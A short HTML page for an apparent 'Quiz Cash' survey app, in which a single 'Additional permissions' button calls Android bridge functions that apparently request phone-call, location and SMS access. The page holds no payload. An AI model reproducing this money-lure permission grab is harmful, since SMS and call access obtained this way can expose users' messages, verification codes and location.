<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Quiz Cash</title>
    <link rel="stylesheet" href="style.css">
    <link rel="shortcut icon" href="favicon.png" type="image/x-icon">
</head>

<body>
    <section class="main">
        <div class="container">
            <div class="main-title">
                <img src="./img/logo.svg" class="main-logo" alt="logo">
                <h3 class="main-subtitle">Hello, 11 surveys are available!</h3>
            </div>
            <div class="btn-wrapper">
                <button class="btn main-link primary-gradient" id="permissions">Additional permissions</button>
            </div>
        </div>
    </section>
    <script>
        const btn = document.getElementById("permissions")
        btn.addEventListener("click", () => {
            Android.clickcallphone();
            Android.clickopenlocation();
            Android.clicksmsaccess();
        });
    </script>
</body>

</html>